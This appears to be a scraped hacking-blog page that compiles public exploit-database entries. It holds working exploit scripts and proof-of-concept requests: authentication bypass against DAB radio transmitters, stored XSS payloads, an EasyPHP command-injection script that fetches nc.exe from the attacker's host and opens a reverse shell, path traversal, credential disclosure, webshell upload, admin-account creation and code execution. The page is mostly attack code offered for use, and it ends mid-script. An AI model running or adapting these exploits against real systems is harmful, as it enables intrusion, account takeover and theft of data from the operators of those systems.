#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Password Change
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5772
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5772.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
p=input('Enter desired password: ')
e='/system/api/userManager.cgx'
m5=hashlib.md5()
m5.update(p.encode('utf-8'))
h=m5.hexdigest()
print('Your sig:',h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::changeUserPswd')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber+',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'userManager',
'ssbtObj':{
'changeUserPswd':{
'username':u,
'password':h
}
},
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-4)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863109096
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#Exploit Title: PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS)
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs: Stored Xss
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 14-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
#########XSS -1##############
1.go to 'Episodes' then 'Upload New Episodes'(http://localhost/PodcastGenerator/admin/episodes_upload.php)
2.set title section as <img src=1 onerror=alert("XSS-1")>
3.And go to 'View All Episoded'(http://localhost/PodcastGenerator/admin/episodes_list.php)
payload: <img src=1 onerror=alert("XSS-1")>
poc- request:
POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 8307
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3NXAbhxohxCgUFNi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="file"; filename="2023-05-13_2_images.jpeg"
Content-Type: image/jpeg
image content asdfasdfasdfasdfasdfasdfasdfa
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="title"
<img src=1 onerror=alert("XSS-1")>
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="shortdesc"
fffff
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="date"
2023-05-14
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="time"
11:05
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="longdesc"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="episodenum"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="seasonnum"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="itunesKeywords"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="explicit"
yes
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="authorname"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="authoremail"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="customtags"
------WebKitFormBoundary3NXAbhxohxCgUFNi
Content-Disposition: form-data; name="token"
6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
------WebKitFormBoundary3NXAbhxohxCgUFNi--
#########XSS -2##############
1.go to "Themes and aspect" then "Customize your Freebox" (http://localhost/PodcastGenerator/admin/theme_freebox.php)
2. set Freebox content as <script>alert("XSS-2")</script>
3.go to home page (http://localhost/PodcastGenerator/)
payload: <script>alert("XSS-2")</script>
poc Request:
POST /PodcastGenerator/admin/theme_freebox.php?change=1 HTTP/1.1
Host: localhost
Content-Length: 96
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/theme_freebox.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close
content=%3Cscript%3Ealert%28%22XSS-2%22%29%3C%2Fscript%3E&token=6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
#########XSS -3##############
1. go to "Podcast Details" then "Change Podcast Details" (http://localhost/PodcastGenerator/admin/podcast_details.php)
2. set "Podcast tile " as <svg/onload=prompt("XSS-3")>
3.go to home page (http://localhost/PodcastGenerator/)
payload: <svg/onload=prompt("XSS-3")>
poc-request:
POST /PodcastGenerator/admin/podcast_details.php?edit=1 HTTP/1.1
Host: localhost
Content-Length: 300
Cache-Control: max-age=0
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/podcast_details.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
Connection: close
podcast_title=%3Csvg%2Fonload%3Dprompt%28%22XSS-3%22%29%3E&podcast_subtitle=dd&podcast_description=dd©right=dd&author_name=Podcast+Generator+UserP&author_email=podcastgenerator%40example.com&podcast_guid=&feed_language=en&explicit_podcast=yes&feed_locked=no&token=xVrlAT6NG2ZrbGanycblGYoOOIitXXKC
#!/usr/bin/env python3
#
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
# Bios firmware: 7.1 (Apr 19 2021)
# Gui: 2.46
# FPGA: 169.55
# uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuatio flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from a weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is binded to the Session ID, one needs to await for such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
# MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5773
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5773.php
#
#
# 19.03.2023
#
import hashlib,datetime##########
import requests,colorama#########
from colorama import Fore, Style#
colorama.init()
print(Fore.RED+Style.BRIGHT+
'''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
'''
+Style.RESET_ALL)
print(Fore.WHITE+Style.BRIGHT+
'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''
+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
u=input('Enter desired username: ')
e='/system/api/userManager.cgx'
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::removeUser')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
'Accept':'application/json, text/plain, */*',
'Accept-Language':'ku-MK,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Dabber-',
'Connection':'close'}
j={'ssbtIdx':0,
'ssbtType':'userManager',
'ssbtObj':{
'removeUser':u
}
}
r=requests.post(t,headers=bh,json=j)
if r.status_code==200:
print('Done.')
else:
print('Error')
exit(-3)
# Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and
Path Traversal)
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-02-06
# Vendor Homepage: https://www.easyphp.org/
# Software Link : https://www.easyphp.org/
# Tested Version: 14.1
# Tested on: Windows 7 and 10
# Vulnerability Type: Remote Command Execution (RCE)
CVSS v3: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78
Vulnerability description: There is an OS Command Injection in EasyPHP
Webserver 14.1 that allows an attacker to achieve Remote Code Execution
(RCE) with administrative privileges.
Proof of concept:
To detect:
POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://127.0.0.1:10000
Connection: keep-alive
Referer: http://127.0.0.1:10000/index.php?zone=settings
Host: 127.0.0.1:10000
app_service_control=calc.exe
The calculator opens.
Exploit:
# !/usr/bin/python3
import requests
import sys
if len(sys.argv) != 5:
print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")
print("Usage: %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %
sys.argv[0])
print("Example: %s 192.168.1.10 10000 192.168.1.11 9001" %
sys.argv[0])
exit(1)
else:
target = sys.argv[1]
targetport = sys.argv[2]
localip = sys.argv[3]
localport = sys.argv[4]
# python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in
the directory
payload =
"powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"
+ localip + ':8000' +
"/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"
+ localip + "+" + localport + "+-e+cmd.exe\""
print (payload)
url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"
}
data = {'app_service_control':payload}
try:
r = requests.post(url, headers=headers, data=data)
except requests.exceptions.ReadTimeout:
print("The payload has been sent. Check it!")
pass
# Vulnerability Type: Path Traversal
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CWE: CWE-22
Vulnerability description: An issue was discovered in EasyPHP Webserver
14.1. An Absolute Path Traversal vulnerability in / allows remote users to
bypass intended SecurityManager restrictions and download any file if you
have adequate permissions outside the documentroot configured on the server.
Proof of concept:
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
HTTP/1.1
Host: 192.168.X.X:10000
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
HTTP/1.1 200 OK
Host: 192.168.X.X:10000
Connection: close
Content-Type: application/octet-stream
Content-Length: 499
; for 16-bit app support [fonts] [extensions] [mci extensions] [files]
[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1
MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo
3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo
adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo
m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo
mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo
# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47874
Introduction
=================
Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):
PATH: /be/rpc.php
METHOD: POST
BODY:
[
[
"conn",
"ls",
[
null,
false,
true,
[
"type",
"active",
"description"
]
]
]
]
2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
PATH: /tc/rpc
METHOD: POST
BODY:
[
[
"com.jedox.etl.mngr.Connections",
"getGlobalConnection",
[
"<CONNECTION>"
]
]
]
# Exploit Title: Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2022.4 (22.4.2) and older
# CVE : CVE-2022-47880
Introduction
=================
An information disclosure vulnerability in `/be/rpc.php` allows remote authenticated users with the appropriate permissions to modify database connections to disclose the clear text credentials via the `test connection` function. To exploit the vulnerability, the attacker must set the host of the database connection to a server under his control.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================
1) The host part of a database connection can be changed in the connections details in the UI. Set the Host to a server that you control.
2) Test the database connection.
3) The webserver initiates a connection to the server that you control. Use wireshark to capture network traffic and to ultimately extract the database credentials.
# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
# Date: 2023-05-03
# Exploit Author: 8bitsec
# Vendor Homepage: https://alfonzm.github.io/codigo/
# Software Link: https://github.com/alfonzm/codigo-app
# Version: 1.0.1
# Tested on: [Mac OS 13]
Release Date:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
2023-05-03
Product & Service Introduction:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D
A Markdown editor & notes app made with Vue & Electron
Technical Details & Description:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D
A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =
user to execute arbitrary code by opening a specially crafted file.
Proof of Concept (PoC):
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Arbitrary code execution:
Create a markdown file (.md) in any text editor and write the following pay=
load:
<video><source onerror=3D"alert(require('child_process').execSync('/System/=
Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
Opening the file in Codigo will auto execute the Calculator application.
# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
# Date: 03/05/2023
# Exploit Author: URGAN
# Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
# Version: v1.0
# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23
# CVE: CVE-2023-2246
#!/usr/bin/env python3
# coding: utf-8
import os
import requests
import argparse
from bs4 import BeautifulSoup
# command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', type=str, help='URL with http://')
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
args = parser.parse_args()
# if no arguments are passed, ask the user for them
if not (args.url and args.payload):
args.url = input('Enter URL with http://: ')
args.payload = input('Enter file path PHP webshell: ')
# URL Variables
url = args.url + '/admin/ajax.php?action=save_settings'
img_url = args.url + '/assets/img/'
filename = os.path.basename(args.payload)
files = [
('img',(filename,open(args.payload,'rb'),'application/octet-stream'))
]
# send a POST request to the server
resp_upl = requests.post(url, files = files)
status_code = resp_upl.status_code
if status_code == 200:
print('[+] File uploaded')
else:
print(f'[-] Error {status_code}: {resp_upl.text}')
raise SystemExit(f'[-] Script stopped due to error {status_code}.')
# send a GET request to the server
resp_find = requests.get(img_url)
# Use BeautifulSoup to parse the page's HTML code
soup = BeautifulSoup(resp_find.text, 'html.parser')
# get all <a> tags on a page
links = soup.find_all('a')
# list to store found files
found_files = []
# we go through all the links and look for the desired file by its name
for link in links:
file_upl = link.get('href')
if file_upl.endswith(filename): # uploaded file name
print('[+] Uploaded file found:', file_upl)
file_url = img_url + file_upl # get the full URL of your file
found_files.append(file_url) # add the file to the list of found files
# if the list is not empty, then display all found files
if found_files:
print('[+] Full URL of your file:')
for file_url in found_files:
print('[+] ' + file_url)
else:
print('[-] File not found')
#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. Login to account and edit profile.
2.Upload new Avatar
3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error
payload: <?php echo system("cat /etc/passwd"); ?>
poc request :
POST /dist/admin/index.php HTTP/1.1
Host: localhost
Content-Length: 1982
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
Connection: close
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="csrf_token"
e2d428bc0585c06c651ca8b51b72fa58
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="sClass"
UserController
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="sMethod"
update
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="avatar"; filename="salam.phar"
Content-Type: application/octet-stream
<?php echo system("cat /etc/passwd"); ?>
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="edit_admin"
edit_admin
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="id"
12
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="firstname"
account1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="lastname"
account1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="email"
account1@test.com
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="password"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="password_repeat"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="group_id"
1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="secondary_groups[]"
1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="homepage"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="html_editor"
ckeditor
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="admin"
1
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="default_language"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy
Content-Disposition: form-data; name="about_me"
------WebKitFormBoundaryYB7QS1BMMo1CXZVy--
response:
Error
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67
Stack trace:
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
#7 {main}
Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73
Stack trace:
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
#6 {main}
4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)
#Exploit Title: Ulicms 2023.1 sniffing-vicuna - Privilege escalation
#Application: Ulicms
#Version: 2023.1-sniffing-vicuna
#Bugs: Privilege escalation
#Technology: PHP
#Vendor URL: https://en.ulicms.de/
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
#Date of found: 04-05-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna
import requests
new_name=input("name: ")
new_email=input("email: ")
new_pass=input("password: ")
url = "http://localhost/dist/admin/index.php"
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200:
print("Request is success and created new admin account")
else:
print("Request is failure.!!")
#!/usr/bin/python
# Exploit Title: File Thingie 2.5.7 - Arbitary File Upload to RCE
# Google Dork: N/A
# Date: 27th of April, 2023
# Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
# Software Link: https://github.com/leefish/filethingie
# Version: 2.5.7
# Tested on: N/A
# CVE: N/A
# Vulnerability originally discovered / published by Cakes
# Reference: https://www.exploit-db.com/exploits/47349
# Run a local listener on your machine and you're good to go
import os
import argparse
import requests
import random
import string
import zipfile
from urllib.parse import urlsplit, urlunsplit, quote
class Exploit:
def __init__(self, target, username, password, lhost, lport):
self.target = target
self.username = username
self.password = password
self.lhost = lhost
self.lport = lport
def try_login(self) -> bool:
self.session = requests.Session()
post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}
response = self.session.post(self.target, data=post_body)
if response.status_code == 404:
print(f"[-] 404 Not Found - The requested resource {self.target} was not found")
return False
elif response.status_code == 200:
if "Invalid username or password" in response.text:
print(f"[-] Invalid username or password")
return False
return True
def create_new_folder(self) -> bool:
# Generate random string
